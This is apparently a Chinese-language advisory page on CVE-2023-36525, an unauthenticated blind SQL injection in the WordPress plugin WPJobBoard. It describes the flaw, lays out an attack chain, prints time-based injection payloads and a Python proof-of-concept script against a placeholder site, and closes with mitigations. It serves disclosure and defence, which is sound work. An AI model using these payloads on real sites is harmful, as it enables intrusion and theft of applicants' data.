CVE-2023-36525: WPJobBoard插件未授权盲注SQL注入漏洞

漏洞信息

漏洞编号

CVE-2023-36525

漏洞类型

SQL注入

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WPJobBoard

漏洞概述

CVE-2023-36525是WordPress插件WPJobBoard中的一个高危安全漏洞，CVSS评分8.6。该漏洞属于SQL注入类型，具体为盲注SQL注入（Blind SQL Injection）。漏洞源于WPJobBoard插件在处理用户输入时，未能正确对特殊字符进行过滤和转义，导致攻击者可以在未经认证的情况下，通过构造恶意SQL语句注入到数据库查询中。由于是盲注类型，攻击者无法直接获取查询结果，但可以通过观察页面响应时间或内容的差异来推断数据库信息。此漏洞影响范围涵盖WPJobBoard从最早版本至5.9.0的所有版本，攻击复杂度低且无需用户交互，攻击者可通过网络直接发起攻击。虽然漏洞对机密性和可用性的影响较低，但对数据完整性存在高风险威胁，攻击者可能利用此漏洞修改数据库内容、窃取敏感信息或进一步横向移动。

技术细节

该漏洞为典型的未授权盲注SQL注入，存在于WPJobBoard插件的SQL查询处理逻辑中。攻击者利用该漏洞时，首先需要识别插件中存在用户输入直接参与SQL查询构建的端点。由于缺乏参数化查询或适当的输入过滤，攻击者可以注入任意SQL逻辑。盲注的特性意味着数据库错误信息不会直接返回，攻击者通常采用时间盲注或布尔盲注两种技术：时间盲注通过注入SLEEP()等时间延迟函数，根据响应时间判断条件真假；布尔盲注则通过观察页面内容差异（如显示/隐藏特定内容）来推断信息。攻击者可通过自动化工具（如SQLMap）构造请求，逐步枚举数据库名、表名、字段名及数据内容。WPJobBoard作为招聘管理插件，通常存储用户简历、职位信息等敏感数据，这些数据面临泄露风险。由于漏洞无需认证即可利用，互联网上任何用户均可尝试攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本及WPJobBoard插件版本，确认版本在受影响范围内（≤5.9.0）

STEP 2

步骤2: 端点识别

通过爬取或扫描识别WPJobBoard插件的API端点，寻找存在用户输入参与SQL查询的接口，如职位搜索、简历查询等功能点

STEP 3

步骤3: 构造注入请求

攻击者构造包含SQL注入载荷的HTTP请求，采用时间盲注或布尔盲注技术，如注入AND (SELECT CASE WHEN条件 THEN SLEEP(5) ELSE 0 END)等条件语句

STEP 4

步骤4: 数据枚举

通过自动化工具（如SQLMap）或手动构造请求，逐步枚举数据库结构：数据库名、表名、字段名，最终提取敏感数据如用户信息、简历内容等

STEP 5

步骤5: 权限提升与持久化

获取数据库权限后，可能通过修改管理员账户密码、写入恶意代码等方式实现持久化控制，进一步获取服务器权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2023-36525 - WPJobBoard Blind SQL Injection PoC
Note: This is a demonstration code for security research purposes only.
"""

import requests
import time
import string
import sys

target = "http://target-site.com/"
# Plugin endpoint that handles job search queries
endpoint = target + "wp-json/wpjobboard/v1/jobs"

def test_vulnerability():
    """Test if target is vulnerable to CVE-2023-36525"""
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # Normal request
    normal_payload = {"search": "test"}
    
    # Time-based blind SQL injection payload
    # If vulnerable, response will be delayed by ~5 seconds
    sql_payload = {
        "search": "test' AND (SELECT * FROM (SELECT SLEEP(5))s1) AND '1'='1"
    }
    
    print("[*] Testing CVE-2023-36525 - WPJobBoard Blind SQL Injection")
    print(f"[*] Target: {endpoint}")
    
    # Test normal request
    start = time.time()
    try:
        r1 = requests.get(endpoint, params=normal_payload, headers=headers, timeout=10)
        normal_time = time.time() - start
        print(f"[*] Normal request time: {normal_time:.2f}s")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error with normal request: {e}")
        return False
    
    # Test malicious request
    start = time.time()
    try:
        r2 = requests.get(endpoint, params=sql_payload, headers=headers, timeout=15)
        sql_time = time.time() - start
        print(f"[*] SQL injection request time: {sql_time:.2f}s")
    except requests.exceptions.Timeout:
        print("[+] Target appears VULNERABLE (request timed out)")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Error with SQL request: {e}")
        return False
    
    # Check if response time indicates vulnerability
    if sql_time > 4.5:
        print("[+] Target appears VULNERABLE to CVE-2023-36525")
        return True
    else:
        print("[-] Target may not be vulnerable")
        return False

if __name__ == "__main__":
    test_vulnerability()

影响范围

WPJobBoard 所有版本 ≤ 5.9.0

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）限制或禁用WPJobBoard插件的搜索和查询功能；2）通过Web应用防火墙添加SQL注入特征规则，拦截包含UNION、SELECT、INSERT、DROP等SQL关键字的可疑请求；3）临时关闭或限制该插件的网络访问权限；4）启用数据库查询日志监控，密切关注异常查询行为；5）限制访问WPJobBoard相关API端点的IP来源，建议仅允许内网或受信任IP访问。建议同时关注插件官方安全公告，及时应用安全更新。